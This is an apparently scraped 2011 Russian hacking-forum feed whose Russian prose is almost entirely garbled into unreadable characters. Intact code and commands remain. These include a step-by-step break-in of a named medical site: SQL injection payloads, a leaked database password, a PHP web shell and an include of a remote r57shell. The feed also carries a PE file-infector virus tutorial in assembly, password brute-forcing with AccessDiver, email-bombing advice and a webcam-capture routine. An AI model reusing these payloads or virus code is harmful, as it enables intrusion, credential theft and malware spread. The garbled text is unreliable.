Budonlaine

��

mybb@mybb.ru (Administrator) — Mon, 24 Jan 2011 18:29:16 +0300

��

�� Vkontakte.ru �� . ��, ��

vzlomvkontakte.ru �� . "�� .��.

�� ID �� . �� . �� . �� . � ��, �� .

�� : http://vkontakte.ru/friend.php?act=add& … =c259cfaf. �� , �� . �� ID �� .

�� : �� : http://vkontakte.ru/photos.php?id=01234556 (�� ID � �� ).

�� : http://vkontakte.ru/video.php?id=01234556 (�� ID � �� ).

�� : http://vkontakte.ru/notes.php?id=01234556 (�� ID � �� ).

�� . �� , �� vkontakte.ru �� . �� : �� , �� , �� , �� . �� fenst �� :

�� :

http://cs52.vkontakte.ru/u2772114/42293 … 320F3f.jpg

�� _� �� x�:

http://cs52.vkontakte.ru/u2772114/42293 … 0F3f.jpg�.

�� , �� , �� , �� , �� , �� -�� -�� .

��

��, �� , � �� : �� . �� , �� . ��, 29 ��, �� , �� : �� mail.ru �� , � �� ?�. �� , �� , �� -�� . � �� , �� !� � �� . ��, �� , �� .

�� (�� ) �� , � �� , � �� Mail.Ru. �� , �� : �� , ��-�� . �� , �� , �� , �� .

�� : �� . �� double_whiskey �� Paparazzi �� : �� , �� . �� (�� , �� ), �� . �� : �� ?�

��, �� . �� -�� : �� -�� -�� . �� -�� , �� . � ��, �� , � � �� . �� , �� -�� -�� (� �� 500 ��). � �� , � �� . � �� , � �� . ��-�� , �� .

�� .

��

�� , �� , �� , � �� . � �� . �� , �� .

22-�� , �� , �� . �� , �� . �� .

�� , �� 20 ��. ��.

�� no-steam css-��

mybb@mybb.ru (Administrator) — Sun, 23 Jan 2011 13:31:03 +0300

�� http://wolfsy.clan.su/hldsupdatetool.rar
�� hldsupdatetool.rar
�� , �� hldsupdatetool, �� , ��, �� , � �� :

�� Europe � �� Next. �� Next � Finish

�� hldsupdatetool (� �� C:\Server). �� HldsUpdateTool.exe, � �� HldsUpdateTool.exe ��
�� , �� , �� :
�� 1 ��! �� .

�� HldsUpdateTool �� (� �� C:\Server). �� , �� Update.bat
�� \��
� �� :start /wait c:\server\hldsupdatetool.exe
start /wait c:\server\hldsupdatetool.exe -command update -game "Counter-Strike Source" -dir .
exit

�� \��
� �� Update.bat. �� . ��.
Update.bat �� (� �� C:\Server)! �� , �� a � �� , �� :

�� 1 - 1.2 GB (�� ), �� , �� . �� .
�� , �� Start.bat, �� . �� , � �� :@echo off
cls
echo Protecting srcds from crashes...
echo If you want to close srcds and this script, close the srcds window and type Y depending on your language followed by Enter.
title srcds.com
:srcds
:loop
echo (%date% %time%) srcds started.
start C:\Server\srcds_fps_boost.exe
start /wait C:\Server\srcds.exe -console -game cstrike -tickrate 66 -port 27015 +fps_max 600 +maxplayers 12 +map de_dust2
goto srcds
echo (%date% %time%) WARNING: srcds closed or crashed, restarting.
goto loop

�� : �� de_dust2 , TickeRate 66(�� , �� , �� ), �� 27015 , FPS �� 600 � 12 �� . (12 ��)

�� , �� , �� .

1. -autoupdate �� .

2. -insecure �� (Valve Anti-Cheat).

3. -nobots �� .

4. -verify_all �� , �� .

5. +ip <�� 192.168.0.1> �� IP ��, �� .

6. +sv_lan <�� 0/1> �� 1, �� (LAN).

7. +maxplayers <�� 1 �� 32> �� .

8. +map <��> �� .

9. +hostname "�� " �� .

10. -tickrate <�� 33\66\100> �� tickrate �� (�� Source Multiplayer Networking).

11. -port <�� 27015\27016\27017\27018> �� .

12. +fps_max <�� 300\600\1000> FPS ��

13. +tv_port <�� 27020\27021\27022\27023\27024> �� SourceTV.

�� \�� \Start.bat � �� (� �� C:\Server)

�� . �� 40 �� .

mybb@mybb.ru (Administrator) — Sun, 23 Jan 2011 13:00:13 +0300

� �� 40 ��. �� . �� , �� .

�� , �� , � �� 40 �� . �� 130 �� , �� .

�� 83.133.120.252, �� Nod32. � �� , �� .

�� Trojan.Win32.VkHost.an, �� 28 ��. �� : �� , �� . �� .

�� hosts �� , �� vkontakte.ru � odnoklassniki.ru �� 83.133.120.252, �� .
�� .

�� , �� , � �� , �� .

�� , � �� , �� , �� IP-�� -��. �� SMS, �� $10.
�� ?

�� hosts, �� Windows �� \system32\drivers\etc. �� vkontakte.ru � odnoklassniki.ru, �� .

�� . � � �� , �� SMS-��, �� .

�� , �� , �� . �� .

�� , �� , �� (ICQ, �� .�.).

�� ?

mybb@mybb.ru (Administrator) — Sun, 23 Jan 2011 12:38:43 +0300

�� ?

�� , �� 97 �� , �� -��, �� , �� , �� . �� , �� , �� , �� , �� .

�� , �� , �� .

�� , �� ?

�� -��, �� , �� , �� , � �� , �� , �� , �� .

��! �� -��, �� (�� ), �� : �� , �� , �� , �� , �� - �� , �� .

��, �� , �� (�� , �� ). � �� , �� (�� , �� ).

��! �� -��: ��, ��, �� , �� 48 ��, �� , �� .�..

�� , �� , �� -��?

�� , �� . �� , �� -��, �� , �� . �� , � �� , �� .

� ��, �� , �� . �� -��, �� , �� .

�� , �� (�� 7 ��, �� , ��, �� @, #, � �� -��). �� .

�� , �� . �� .

�� , �� ?

1. �� , � ��.

2. �� , �� . �� , �� .

3. �� , �� -��. ��, �� -�� , �� . �� .

4. �� . �� , �� ? �� ! �� , �� . �� , �� . �� , � �� . �� , �� .

5. �, ��, �� , �� : �� -�� , �� , �� .

�� -��: �� #1

mybb@mybb.ru (Administrator) — Sun, 23 Jan 2011 12:36:33 +0300

�� !

�� -�� -�� ? ��, �� . �� , � �� . �� .

� �� :
1. �� .
�� . �� (�.�. ��, �� ), � �� , �� . �� , � �� 'sing up', �� , �� , �� , �� , ��. 50% �� 13. � ��, ��, �� /�� = ��/��. � �� . �� passwords-��, �� , �� , �� . �� , ��, �� . �� - NetMole Spider, �� passords-��, �� . �� , �� . � �� , ��. ��, �� , �� 'go', �� , �� , � �� . �� , �� 'custom save LOGINs to file'. �� . �� , �� , �� /�� , �� . �� . �� accessdiver, �� . �� , �� , �� wwwacsessdiver.com. �� , �� 'My Skill' �� 'NEWBIE'. �� 'Dictionnary', 'Load a combo file' - �� , �� , �� Remove > Duplicates. �� . �� , �.�., � ��, �� , �� . � �� , ��, �� -�� , �� , �� . �� 'Options' � �� 'Use this feature' �� , � �� , �� , �� spylog.ru. �� 'Options' �� - 'Manipulation'. �� , �� . �� 'server' �� member-�� Standart. �� , ��. �� , � ��, �� . � ��, �� , accessdiver �� . �� , �� , �� /��, � �� , � �� . �� , � �� . ��? � ��. �� . � �� ! �� , �� /��_��.

�� : ��

mybb@mybb.ru (Administrator) — Sun, 23 Jan 2011 12:34:21 +0300

In Fraud We Trust

�� . �� , �� , �� . ��, �� , �� , � �� . �� , �� , � ��, 100 ��, �� , � � �� . �� , �� : VPN � Socks. �� , � �� , ��
��

C�� PHP. �� - �� , �� . �� , �� SQL/PHP-��, PHP-�� XSS, �� . �� CGI-�� . � �� CGI-�� Nikto. �� , �� , �� , �� Perl. ��, �� . � �� :

./nikto.pl -host site.ua �generic

�� PuTTY, �� nmap, �� , �� :

./nmap -sT -F site.ua

�� , � �� : �� FTP, SSH, HTTP/HTTPS, POP3/SMTP, http-�� SQUID, �� . �� SQUID, �� , �� . � �� , Nikto �� . �� , �� , - �� mod_ssl, �� , � ��, �� .

�� . �� /icons, �� -�� :). �� , �� phpMyAdmin � �� . � �� . �� , �� /config. �� SQL-��, � �� ' or '1' = '1'�, � �� . � �� , � �� /webmail (� �� ) � �� Error_Log, � �� PHP-��:

[20-Dec-2005 23:56:19] PHP Warning: file(news.xml): failed to open stream: No such file or directory in /home/medicalc/public_html/money/xml.php on line 14
[20-Dec-2005 23:56:19] PHP Warning: join(): Bad arguments.
in /home/medicalc/public_html/money/xml.php on line 14
[20-Dec-2005 23:56:19] PHP Fatal error: Call to a member function on a non-object in /home/medicalc/public_html/money/xml.php on line 26
[20-Dec-2005 23:59:03] PHP Fatal error: Call to a member function on a non-object in /home/medicalc/public_html/money/xml.php on line 26
[21-Dec-2005 00:03:49] PHP Warning: fopen(rss.xml): failed to open stream: Permission denied in /home/medicalc/public_html/money/rss.php on line 57
[09-Jan-2006 17:42:28] PHP Warning: mysql_connect(): Can't connect to local MySQL server through socket '/var/tmp/mysql.sock' (2) in /home/medicalc/public_html/money/index.php on line 5

��, �� -�� , �� . �� , �� MySQL � �� : /home/medicalc/public_html/emoney.

�� , �� IRC? ��. �� , �� , - �� /server-status. ��
��

�� /server-status? �� , � �� Apache'�� . �� -��: �� Apache, �� .�., �� , �� , �� CPU. �� , �� , �� . � ��, �� , �� .

�� , �� Apache

� �� . � �� , �� 5-6. �� . �� , �� , ��, �� : � �� . ��, �� - �� chmod'�, �� , � �� - �� :).

��, � �� medicalc.ua. ��? �� , �� Error_Log'e �� PHP-��:

[09-Jan-2006 17:42:28] PHP Warning: mysql_connect(): Can't connect to local MySQL server through socket '/var/tmp/mysql.sock' (2) in /home/medicalc/public_html/money/index.php on line 5

�� , � �� . ��, �� , �� , �� . ��, ��, �� (� � ��, �� , �� ) �� Reverse IP LookUp, � �� NSD �� 2005 �� WEB��. ��, � ��, �� domainsdb.org ��, �� wwwdomaintools.com.

��, �� medicalc.ua, � �� , �� . �� , � �� . �� -�� /guestbook, ��, �� , �� , �� , �� XSS �� :). �� , � �� index.php?id=37�. �� id �� :

PHP Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/medicalc/public_html/medical/index.php on line 416

��! SQL-�� !
�� !

� ��, �� MySQL �� UNION SELECT ALL_DATABASE_DUMP �� UNION SELECT OTDAY_MNE_VSE_PAROLI :), �� , �� . �� , �� 6 � ��, �� , �� :

http://medicalc.ua/index.php?id=1+UNION … ,3,4,5,6/*

�� MySQL-�� , � �� :

http://medicalc.ua/index.php?id=1+UNION … 4,5,6,user()/*
http://medicalc.ua/index.php?id=1+UNION … 6,database()/*
http://medicalc.ua/index.php?id=1+UNION … ,6,version()/*

�� , ��: � �� , �� localhost; � �� - �� medicalc, � �� - �� MySQL (��, �� ).

�� - �� . � �� : � �� MySQL-�� LOADFILE()? �� , �� - �� :). �� , �� . �� , � �� :

http://medicalc.ua/index.php?id=1+UNION … 2,3,4,5,6, LOADFILE('/home/medicalc/public_html/medical/index.php')/*

� �� - �� index.php! ��! � �� include("dbconfig.php")� � �� , �� :

<?php
$CONFIG['database'] = 'medicalc';
$CONFIG['user'] = 'medicalc';
$CONFIG['passwd'] = 'AfLkYjii';
$CONFIG['host'] = 'localhost';
?>

�� , ��, �� phpMyAdmin �� : �medicalc:AfLkYjii�. �� , �� phpMyAdmin. � �� , ��-�� $1 �� . � �� : �� phpMyAdmin, �� ? (�� , � �� ? �� Forb��). �� FTP � �login incorrect�.

�� - �� SQL-�� INTO OUTFILE�. �� : �� -�� <? system($_GET['cmd']); ?>� �� -�� . ��, �<? include("http://M3lc1y.narod.ru/r57shell.txt"); ?>�. �� - �� GET-��. �� ! �� , �� r57shell �� rst.void.ru, �� POST-��, �� , ��, �� POST �� -�� , �� GET, �� .

��-�� :). ��, �� PHP-��, ��, � �� med_users, � �� password � id, �� 20. � �� SELECT password FROM med_users WHERE id=20� �� PHP-��, �� . � MySQL �� INTO OUTFILE�, �� . � �� , �� SQL ��: �SELECT password FROM med_users WHERE id=20 INTO OUTFILE '/home/medicalc/public_html/medical/temp.php'�, �� -��. �� . ��-��, �� SQL-��, �� INTO? �, ��-��, �� . �� :). ��, �� . � �� -�� . �� , ��, �� . �� /home/medicalc/public_html/medical/guestbook.

� �� :

SELECT password FROM med_users WHERE id=20 INTO OUTFILE '/home/medicalc/public_html/medical/guestbook/temp.php'

�� http://medicalc.ua/guestbook/temp.php � �� -��! �� ! �� , �� FreeBSD 6.0. �� - �� , �� !

� �� , �� :). �� Safe Mode, �� tar-�� , �� (�� Safe Mode). �� , �� , � ��, �� guestbook �� .

�� DxGotoFTP, �� . �� , �� FTP-��, �� . �� , �� PHP. �� , �� perl'�� -�� /cgi-bin, ��, � ��, �� (nobody). �� FTP, � �� , �� MySQL-��.

� �� , �� WebMoney. �� 2005 �� nikitozz'a �� WM-��, � �� .
��

��, �� , �� , � �� , � �� . �� -�� -�� 500 WMZ (�� , �� - �� - � �� ) �� , �� , � �� . � �� - n'�� . � � �� . �� X� � ��, �� , �� :).

�� . �� , �� . �� , �� , ��, �� -�� , �� . �� , ��, �� .

�� PE-�� 1

mybb@mybb.ru (Administrator) — Sun, 23 Jan 2011 12:32:26 +0300

��

�� (� �� ) ��. �� , ��, �� , � �� , �� . �� , �� -�� , �� . ��, �� -�� . � �� . �� , �� -�� . ��, � ��-�� -�� , � �� - �� - ��.

� �� , �� PE (Portable Executable) EXE. �� -��, �� , �� .

�� , �� . �� , �� -�� . �� , �� .

�� , ��, ��, �� .
�� PE

�� PE-��, ��, ��, �� . �� Windows ��. ��, �� , �� , �� . �� Win 9x\Me\NT\2000\XP\2K3.

��, �� , �� :
PE-�� (MZ-��) �� DOS. �� stub � �� . �� PE-�� DOS �� OS/2, �� , �� , �� . �� DOS, �� . �� DOS-�� , �� IMAGE_NT_HEADERS (PE-��). �� :
typedef struct _IMAGE_NT_HEADERS {
DWORD Signature;
IMAGE_FILE_HEADER FileHeader;
IMAGE_OPTIONAL_HEADER32 OptionalHeader;
}

�� IMAGE_NT_HEADERS � �� PE-��. �� PE-�� "PE\0\0". �� , �� IMAGE_FILE_HEADER. �� PE-��. �� - IMAGE_OPTIONAL_HEADER32. �� PE-��. �� (Object Table). � �� . �� . � �� PE-�� (�� -�� ).
�� PE

�� , �� , �� :
�� PE-��
��
��

�� . �� , �� , �� -�� , �.�. �� . �� , �� , �� , �� , �� . �� , �� - �� EXE, �� . �� , �� , �.�. �� . �� , �� . �� , �� -�� .

�� , �� (�� - �� ) � PE-��, �� , �� , � �� , �� , � �� - �� . �� , �� :
�� -��

��, �� . ��, �� , ��, �� API-��. �� : Virtual Address (VA) � Relative Virtual Address (RVA).

VA - �� -�� . RVA - �� -�� , �� . � �� , �� VA = RVA + ��.

�� , �� . � �� - ��-��.

�� ? �� . �� (�� ), �.�. �� , �� , �� , �� . �� , �� . � �� . �� , �� , � �� , �� . ��, �� . �� , �� , �� . �� , �� , �� -��. �� , � �� , �� .
�all VirDelta
VirDelta:
sub dword ptr [esp], OFFSET VirDelta
push dword ptr [esp] ; �� -��

�� , �� call. �� call �� . �� VirDelta � �� . �� -�� (�� , �� ).
�� API-��

�� . �� kernel32.dll � ��, �.�. �� . �� , �� LoadLibrary � GetProcAddress, �� kernel32.dll.

�� kernel32, �� - �� SEH (Structured Exception Handling).

SEH �� - �� , � �� . �� fs:0000 � �� , �� 0FFFFFFFFh. �� ? � ��, �� - �� kernel32.dll � ��.

��, ��-�� . �� kernel32:
; �� SEH
ReadSEH:
xor edx, edx ; edx = 0
assume fs:flat
mov eax, fs:[edx] ; �� SEH
dec edx ; edx = 0FFFFFFFFh

; �� 0FFFFFFFFh
SearchKernel32:
cmp [eax], edx ; �� 0FFFFFFFFh
je CheckKernel32 ; ��, ��
mov eax, [eax] ; ��
jmp SearchKernel32 ; �� - ��

; �� Kernel32
CheckKernel32:
mov eax, [eax + 4] ; �� -��
; kernel32.dll
xor ax, ax ; ��

; �� MZ
SearchKernelMZ:
cmp word ptr [eax], 5A4Dh ; �� MZ
je CheckKernelMZ ; �� , ��
; �� PE
sub eax, 10000h ; �� MZ, ��
jmp SearchKernelMZ

; �� PE
CheckKernelMZ:
mov edx, [eax + 3Ch] ; �� PE-��
cmp word ptr [eax + edx], 4550h ; ��
jne _Exit ; �� , ��
; ��

�� (� �� , �� ) �� MZ (4D5Ah). �� , ��, �� . �� 3Ch �� PE-��. �� 2� �� PE (5045h) (�� , �� , �� MZ). �� PE, �� kernel32.dll �� .

�� PE-��, �� :

�� API-�� kernel32, �� . �� 78h �� PE-�� RVA �� . �� , �� RVA, � VA. �� RVA �� Image Base (�� , �� ). �� .

�� : � �� Win32VersionValue? �� , �� -�� . � �� , �� .

�� . �� :

�� . �� . �� RVA �� . �� (�� ) �� DWORD RVA (�� 4 �� ). �� - RVA �� . �� - RVA �� . �� (Ordinal Base).

��, �� kernel32.dll. �� , �� , � �� , �� . �� -�� (� �� ) �� .

�� (�� ), �� 4-�� -�� . �� HEX-�� , �� :
; ��
HashTable:
dd 0F867A91Eh ; CloseHandle
dd 03165E506h ; FindFirstFileA
dd 0CA920AD8h ; FindNextFileA
dd 0860B38BCh ; CreateFileA
dd 029C4EF46h ; ReadFile
dd 0CC17506Ch ; GlobalAlloc
dd 0AAC2523Eh ; GetFileSize
dd 07F3545C6h ; SetFilePointer
dd 0F67B91BAh ; WriteFile
dd 03FE8FED4h ; GlobalFree
dd 015F8EF80h ; VirtualProtect
dd 0D66358ECh ; ExitProcess
dd 05D7574B6h ; GetProcAddress
dd 071E40722h ; LoadLibraryA
dd 0E65B28ACh ; FindClose
dd 059B44650h ; GetModuleFileNameA
dd 00709DC94h ; SetCurrentDirectoryA
dd 0D64B001Eh ; FreeLibrary
dw 0FFFFh ; ��

� �� , � ��-�� (�� ). �.�., ��, �� -�� kernel32. �� -�� HashTable. �� , ��. �� :
_SearchAPI:
mov esi, [eax + edx + 78h]
add esi, eax
add esi, 18h
xchg eax, ebx
lodsd ; ��
push eax ; [ebp+4*4]
lodsd ; �� RVA ��
push eax ; [ebp+4*3]
lodsd ; �� RVA ��
; ��
push eax ; [ebp+4*2]
add eax, ebx
push eax ; ��
; [ebp+4*1]
lodsd ; �� RVA ��
push eax ; [ebp]
mov edi, [esp+4*5] ; edi = ��_��
lea edi, [edi+HashTable] ; edi �� HashTable
mov ebp, esp ; ��

_BeginSearch:
mov ecx, [ebp+4*4] ; ��
xor edx, edx ; ��
; �� (�� 0)

_SearchAPIName:
mov esi, [ebp+4*1]
mov esi, [esi]
add esi, ebx ; �� AS�II-�� API-
; ��

; �� -��
_GetHash:
xor eax, eax
push eax
_CalcHash:
ror eax, 7
xor [esp],eax
lodsb
test al, al
jnz _CalcHash
pop eax

; ��
OkHash:
cmp eax, [edi] ; �� hash � ��
; �� HashTable
je _OkAPI ; ��
add dword ptr [ebp+4*1], 4 ; ��
; ��
inc edx
loop _SearchAPIName
jmp _Exit

; ��
_OkAPI:
shl edx, 1 ; ��
mov ecx, [ebp] ; ��
add ecx, ebx
add ecx, edx
mov ecx, [ecx]
and ecx, 0FFFFh
mov edx, [ebp+4*3] ; �� RVA ��
add edx, ebx
shl ecx, 2
add edx, ecx
mov edx, [edx]
add edx, ebx
push edx ; ��
; ��
cmp word ptr [edi+4], 0FFFFh ; �� ?
je _Call_API
add edi, 4 ; �� hash-��

_NextName:
mov ecx, [ebp+4*2] ; ��
add ecx, ebx
mov [ebp+4*1], ecx ; Index � ��
jmp short _BeginSearch

�� -�� ? �� Visual C++ � �� , �� (� ��).

�� :
CloseHandle equ dword ptr [ebp-4*1]
FindFirstFileA equ dword ptr [ebp-4*2]
FindNextFileA equ dword ptr [ebp-4*3]
CreateFileA equ dword ptr [ebp-4*4]
ReadFile equ dword ptr [ebp-4*5]
GlobalAlloc equ dword ptr [ebp-4*6]
GetFileSize equ dword ptr [ebp-4*7]
SetFilePointer equ dword ptr [ebp-4*8]
WriteFile equ dword ptr [ebp-4*9]
GlobalFree equ dword ptr [ebp-4*10]
VirtualProtect equ dword ptr [ebp-4*11]
_ExitProcess equ dword ptr [ebp-4*12]
GetProcAddress equ dword ptr [ebp-4*13]
LoadLibrary equ dword ptr [ebp-4*14]
FindClose equ dword ptr [ebp-4*15]
GetModuleFileNameA equ dword ptr [ebp-4*16]
SetCurrentDirectoryA equ dword ptr [ebp-4*17]
FreeLibrary equ dword ptr [ebp-4*18]
��

�� . �� . �� MASM. �� ? �� .

�� main.asm, �� :
.386
.model flat, stdcall
option casemap:none

pushz macro szText:VARARG
local nexti
call nexti
db szText, 0
nexti:
endm

includelib lib\kernel32.lib

ExitProcess PROTO :DWORD

.data
db 0
.code
invoke ExitProcess, 0
start:

; ��
include inc\start_code.inc

; ��
include inc\virus_code.inc

; ��
include inc\data.inc

end start

� �� start_code.inc �� -��, �� kernel � �� . �� . �� .

�� , �� :
�� szText?
�� kernel32.lib � �� ExitProcess �� ?

�� , � �� -�� , �� . ��, � �� LoadLibrary:
pushz �user32.dll�
call LoadLibrary

�� ExitProcess, �� Windows XP (Win9x\Me\NT\2000). �� . �� . �� , �� , �� . �� , �� .

�� (user manual): #1

mybb@mybb.ru (Administrator) — Sun, 23 Jan 2011 12:29:45 +0300

�� - �� E-mail (��, �� - ��:)). �� , �� , �� . � �� , �� , �� ! (�� ) � �� (�� ), �� - �� ! �� E-mail � �� - ��! ��, �� (��, BBS, Chat, IRC), �� .
�� , � �� , �� -��. �� . ��, �� 18-�� : �� -��il �� ! ��-�� , �� [�]��, [�]��, [�]�� .
�� -��. �� (�� , �.�. �� ). �� - �� , �� . �� - OutLook Express, �� c�� (�� !).

Ready? GO!

�� ? �� . ��, � �� , �� (�� ). �� (�� ) �� . �� - "�� ?" �� "�� ". ��, � �� !

�� wwwmail.ru, wwwe-mail.ru � wwwnewmail.ru, etc. ��, �� - �� - �� -�� (�� ). ��, �� , �� .

Let`s go FLOOD

�� : �� - ��, � ��, ��/c�� . �� - �� - � �� 1000 �� 100 �� . �� . ��-�� , �� ! ��, � �� 3 ��:

1. ��, �� , �� 25 �� -�� (�� , � �� , �� , �� FTP sit'�� , �� -�� :)).

2. �� -��. �� , �� . �� , �� : HackTek � �� Avalanch. �� :). ��, �� -��. �� - �� wwwvoid.ru=)).

3. �� , �� wwwmail.ru �� wwwinbox.ru � �� 20 �� 500��. �� , �� , �� , �� . �� .

4. �� -�� (�� ) (�� , �� . � �� , �� , �.�. �� . �� , �� . �� : �� , � �� . �� . �� - �� - �� , �� , �� . �� :).

4. �� cgi-�� . �� CuTTer-a (cutter@real.xakep.ru) � �� :).

�� ?

� �� , �� : I�-��, �� - ��, �� , �� , �� , �� , �� , �� . ��, �� , �.�. ��! �� . �� Outlook-��, �� , �� . �� . � The Bat! �� : �� , �� . �� .

� ��, �� , � �� . # - �� .
Return-Path: sony-lamer@mail.ru
#�� , �� , �.�. �� (�� ).
Received: from relay1.aha.ru ([195.4.67.135] verified) by aha.ru (CommuniGate Pro SMTP 3.2b4)
with ESMTP id 4637825 for system@local.net; Sun, 10 Jun 1899 13:17:51 +0400
#��
Received: from elephant.mail.ru (elephant.mail.ru [194.226.198.85]) by relay1.aha.ru
(8.9.3/8.9.3/aha-r/0.04B) with ESMTP id XAA00604 for (system@local.net); Sun, 11 Jul 1999 23:16:46+0400 (MSD)
#�� IP�� \��
Received: from camel-int ([10.0.1.1] helo=camel.mail.ru) by elephant.mail.ru
with esmtp (Exim2.12 #1) id 113P5h-000NVu-00; Sun, 11 Jul 1999 23:16:45 +0400
Received: (from mail@localhost) by camel.mail.ru (8.9.2/8.9.1) id XAA64053; Sun,
11 Jul 199923:16:45 +0400 (MSD)Date: Sun, 10 Jun 1899 13:17:51 +0400 (MSD)
#�� .
Message-Id: 199907111916.XAA64053@camel.mail.ru
#�� . �� -�� , �� , �� . �� .
Received: from [212.46.8.60] by win.mail.ru with HTTP; Sun, 10 Jul 1985 19:16:45 +0000 (GMT)
#��! IP-��
From: =?KOI8-R?Q?"��=20�"?= (sony-lamer@mail.ru)
#��
To: system@local.net
#�� .
Cc: sony-lamer@mail.ruSubject: =?KOI8-R?Q?Re:=20��-��=��?=
Mime-Version: 1.0X-Mailer: The Bat! (v1.33) S/N 9EB473C9
#�� The Bat! �� .
X-Originating-IP: [212.46.8.60]?IP'�� ,�� .
Content-Type: text/plain; charset=koi8-r
#�� KOI8-R
Content-Transfer-Encoding: 8bit?
�� :).

�� -�� , �� . � �� , � �� 10000! ��, �� - �� 100%. �� FBI �� , �� IP � ��-�� (�� !). ��, � ��, �� - �� , � � �� (�� : �� !:)).

Brute Force

�� Brute Force. �� - �� ! �� -��. �� Brute Force �� (page) �� Java-��. � �� (� �� ) �� ! � �� 2-4 ��! �� . �� - �� , �� (�� [x]).

�� .

�� . � ��, �� . �� . ��, �� sony-lamorz@mail.ru. �� , � �� , �� , �� . �� , � �� sony-lamorz@mail.ru. � �� , �� ?:)). �� , �� , �� . �� txt �� , �� , �� , �� . �� .�� [support@mail.ru] � �� , ��, �� , �� :). � �� . �� , �� , �� : �� , �� , �� more details, �� , � �� . �� .��, �� , �� , � �� , �� , ��, �� , � � �� :) �� .��, � �� , �� ! �� , ��. �� , �� 50 �� , �� . �� , ��:
� ��, �� (#�� )
�� Microsoft � ��
E-mail:rus_microsoft@mail.ru
http://www.microsoft.com/rus

�� : ��

mybb@mybb.ru (Administrator) — Sun, 23 Jan 2011 12:27:30 +0300

� ��, � �� , �� . �� , �� , �� . � �� , �� , � �� . � �� , �� (� � �� ) �� , �� . � �� , �� .
Search and Recover

�� , �� : �� ; �� , �� ; �� (�� cd-dvd � �� ); �� , � �� , �� Windows, �� Microsoft Outlook, Outlook Express, Netscape Mail, � QUALCOMM Eudora. �� , ��, �� .�. � MS Outlook. �� preview, �� , �� (�� , �� , �� , � �� ).

Search and Recover �� : �� . ��, �� - �� , �� , �� , �� . � �� . �� . �� , �� . �� : �� (�� , ��, ��, �� ). �� , �� , �� .

� �� (�� ) � ��, �� , �� .
EasyRecovery

[�� ]

� �� EasyRecovery Professional �� 300 �� MIDI-��, �� , �� , � �� . �� , EasyRecovery �� DataRecovery, �� FileRecovery, �� , �� .

�� : �� ; �� ; �� DIP-�� (�� ); �� , �� Caldera DR-DOS.

�� , �� , � �� , �� . ��, �� , � ��, �� . �� , �� , �� , �� 90%. � �� SMART �� (��) � �� (�� ).

�� , �� . �� , �� , �� , �� (�� ) � �� , �� .
DiskInternals Uneraser

[�� ] +
[�� (�� NTFS) � �� (�� NTFS5) ��, �� , �� ]

�� , �� FAT32 � Windows 2000/XP �� . �� , �� Windows 2000/XP � � FAT32 �� . �� , �� , �� , �� , � �� , �� . (�� . �� .) �� NTFS �� , � �� . �� Lost files.

�� . �� , �� (�� ), � �� , �� . �� (��) �� . �� , � � �� .

�� . �� , �� , � �� .

�� -��: �� -��

mybb@mybb.ru (Administrator) — Sun, 23 Jan 2011 12:26:29 +0300

�� , �� . �� , �� . �� . �� , �� -�� , �� .
�� : ��

� �� , �� , �� .NET Framework �� -��. � �� (�� SilverLight-�� ), �� , �� VS2010 � 4-�� .NET�a.

�� , � �� . �� , �� MSDN � �� DirectDraw. � �� , �� -�� DirectDraw �� . � �� , �� .

�� , � �� . �� , � �� . �� (�� ). �� DirectDraw, ��, �� . �� . �� , � �� . �� DirectDraw, �� . �� -�� , �� VFW (Video For Windows).

��, �� (� �� ) �� . ��, �� -��. �� , �� .

� �� , �� , �� , �� . �� , �� win-�� WinAPI ��. ��-�� -�� -�� Delphi. �� .

�� , � �� .
��, �� 1

�� , �� /�� -��. �� . �� . �� . �� . �� . �� , �� . �� , �� , �� , � �� .

�� WindowsAPI �� capGetDriverDescription(). �� :
wDriverIndex � �� . �� 0 �� 9;
lpszName � �� , �� ;
cbName � �� (� ��) �� lpszName;
lpszVer � �� , �� ;
cbVer � �� (� ��), � �� .

� �� , �� TRUE. �� , �� , �� C#. �� :

[DllImport("avicap32.dll")]

protected static extern bool capGetDriverDescriptionA (short wDriverIndex, [MarshalAs(UnmanagedType.VBByRefStr)]
ref String lpszName, int cbName, [MarshalAs(UnmanagedType.VBByRefStr)] ref
String lpszVer, int cbVer);

�� , �� , �� , � �� DLL, � �� . � �� avicap32.dll.

��, �� , �� , � �� . �� , �� :

public static Device[] GetAllCapturesDevices()

{

String dName = "".PadRight(100);

String dVersion = "".PadRight(100);

for (short i = 0; i < 10; i++)

{

if (capGetDriverDescriptionA(i,

ref dName, 100, ref dVersion,

100))

{

Device d = new Device(i);

d.Name = dName.Trim();

d.Version = dVersion.Trim();

devices.Add(d);

}

return (Device[])devices.ToArray

(typeof(Device));

}

�� . �� , � �� capGetDriverDescription. �� MSDN �� , �� (�� capGetDriverDescription()) �� 0 �� 9, �� . �� Device (�� , �� ).

� �� , �� . �� capCreateCaptureWindow(), �� .

�� , ��, �� . ��, �� , �� windows-�� (� ��) �� SendMessage().

�� capCreateCaptureWindow(). �� :
lpszWindowName � ��-�� , �� ;
dwStyle � �� ;
x � �� X;
y � �� Y;
nWidth � �� ;
nHeight � �� ;
hWnd � handle �� ;
nID � �� .

�� handle �� NULL � �� . �� WinAPI, �� -�� . �� , �� , �� capGetDriverDescription(). �� :

deviceHandle = capCreateCaptureWindowA (ref deviceIndex, WS_VISIBLE |
WS_CHILD, 0, 0, windowWidth, windowHeight, handle, 0);

if (SendMessage(deviceHandle, WM_CAP_DRIVER_CONNECT, this.index, 0) > 0)

{

SendMessage(deviceHandle, WM_CAP_SET_SCALE, -1, 0);

SendMessage(deviceHandle, WM_CAP_SET_PREVIEWRATE, 0x42, 0);

SendMessage(deviceHandle, WM_CAP_SET_PREVIEW, -1, 0);

SetWindowPos(deviceHandle, 1, 0, 0, windowWidth, windowHeight, 6);

}

� �� WM_CAP_DRIVER_CONNECT. �� .

�� , �� : WM_CAP_SET_SCALE, WM_CAP_SET_PREVIEWRATE, WM_CAP_SET_PREVIEW. ��, �� , C# �� . �� . �� .

//��

private const int WM_CAP = 0x400;

//��

private const int WM_CAP_DRIVER_CONNECT = 0x40a;

//��

private const int WM_CAP_DRIVER_DISCONNECT = 0x40b;

//��

private const int WM_CAP_EDIT_COPY = 0x41e;

//��/��

private const int WM_CAP_SET_PREVIEW = 0x432;

//��/��

private const int WM_CAP_SET_OVERLAY = 0x433;

//�� previewrate

private const int WM_CAP_SET_PREVIEWRATE = 0x434;

//��/��

private const int WM_CAP_SET_SCALE = 0x435;

private const int WS_CHILD = 0x40000000;

private const int WS_VISIBLE = 0x10000000;

//�� callback-�� preview

private const int WM_CAP_SET_CALLBACK_FRAME = 0x405;

//��

